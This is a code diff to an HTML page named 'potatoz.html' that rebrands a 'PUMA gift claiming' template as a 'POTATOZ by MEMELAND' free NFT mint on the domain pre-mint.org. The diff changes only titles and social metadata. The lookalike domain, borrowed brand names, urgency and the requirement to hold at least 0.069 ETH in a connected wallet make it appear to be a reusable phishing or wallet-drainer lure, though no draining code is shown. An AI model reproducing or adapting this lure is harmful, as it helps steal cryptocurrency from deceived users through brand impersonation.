--- a/potatoz.html
+++ b/potatoz.html
@@ -11,7 +11,7 @@
   <link rel="preconnect" href="https://fonts.googleapis.com" />
   <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
   <meta name="viewport" content="width=device-width,initial-scale=1.0" />
-  <title>PUMA Nitro Token x PUMA Discord | PREMINT</title>
+  <title>POTATOZ by MEMELAND | PREMINT</title>
   <!-- Global site tag (gtag.js) - Google Analytics -->
   <script src="https://www.googletagmanager.com/gtag/js?id=G-W96CGJ7751"></script>
   <script>
@@ -23,7 +23,6 @@
 
     gtag("config", "G-W96CGJ7751");
   </script>
-
   <link rel="icon" href="img/favicon.png" type="image/x-icon" />
   <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
   <script src="https://unpkg.com/bn.js@5.2.0/lib/bn.js"></script>
@@ -32,44 +31,49 @@
 
   <meta name="robots" content="index,follow" />
   <meta name="googlebot" content="index,follow" />
-  <meta name=description content="🎁 Puma Gift Claiming Is Now Live!
-
-Gift Claiming has now opened up for public.
-
-Limited Availability, First come, first served.
-
-Good luck to all participants!
-
-💛 Puma Team">
-  <meta property=og:title content="https://pre-mint.org/puma">
-  <meta property="og:image" content="https://pre-mint.org/img/meta-puma.gif" />
+  <meta name=description content="🎉 We make FREE MINT as we want more people to join the MEMELAND ecosystem
+  
+🟢 We've already filtered raffle winners!
+You have 24 hours to mint!
+  
+🛒 9,999 supply | 1 NFT per wallet available
+  
+❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
+Because 🥔 doesn`t like multi-accounts!
+  
+May the 🥔 be ever in your favor!">
+  <meta property=og:title content="THE POTATOZ : FREE mint is LIVE now">
+  <meta property="og:image" content="https://pre-mint.org/img/meta.gif" />
   <meta property=og:type content=website>
-  <meta property=og:image:alt content="PUMA Nitro Token x PUMA Discord | PREMINT">
-  <meta property="twitter:image" content="https://pre-mint.org/img/meta-puma.gif" />
+  <meta property=og:image:alt content="THE POTATOZ : FREE mint is LIVE now">
+  <meta property="twitter:image" content="https://pre-mint.org/img/meta.gif" />
   <meta name=twitter:card content=summary_large_image>
-  <meta name=twitter:title content="https://pre-mint.org/puma">
-  <meta name=twitter:image:alt content="PUMA Nitro Token x PUMA Discord | PREMINT">
-  <meta property=og:description content="🎁 Puma Gift Claiming Is Now Live!
-
-Gift Claiming has now opened up for public.
+  <meta name=twitter:title content="THE POTATOZ : FREE mint is LIVE now">
+  <meta name=twitter:image:alt content="THE POTATOZ : FREE mint is LIVE now">
+  <meta property=og:description content="🎉 We make FREE MINT as we want more people to join the MEMELAND ecosystem
   
-Limited Availability, First come, first served.
+🟢 We've already filtered raffle winners!
+You have 24 hours to mint!
   
-Good luck to all participants!
+🛒 9,999 supply | 1 NFT per wallet available
   
-💛 Puma Team">
-  <meta name=twitter:description content="🎁 Puma Gift Claiming Is Now Live!
-
-Gift Claiming has now opened up for public.
+❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
+Because 🥔 doesn`t like multi-accounts!
   
-Limited Availability, First come, first served.
+May the 🥔 be ever in your favor!">
+  <meta name=twitter:description content="🎉 We make FREE MINT as we want more people to join the MEMELAND ecosystem
   
-Good luck to all participants!
+🟢 We've already filtered raffle winners!
+You have 24 hours to mint!
   
-💛 Puma Team">
-
+🛒 9,999 supply | 1 NFT per wallet available
+  
+❗️ REQUIREMENTS: Have at least 0.069 ETH on your wallet
+Because 🥔 doesn`t like multi-accounts!
+  
+May the 🥔 be ever in your favor!">
   <meta name="theme-color" content="#fc780d">
-  <link type="application/json+oembed" href="https://pre-mint.org/img/t/gfgy.json" />
+  <link type="application/json+oembed" href="https://pre-mint.org/img/p/gfgy.json" />
 
   <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
   <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css">
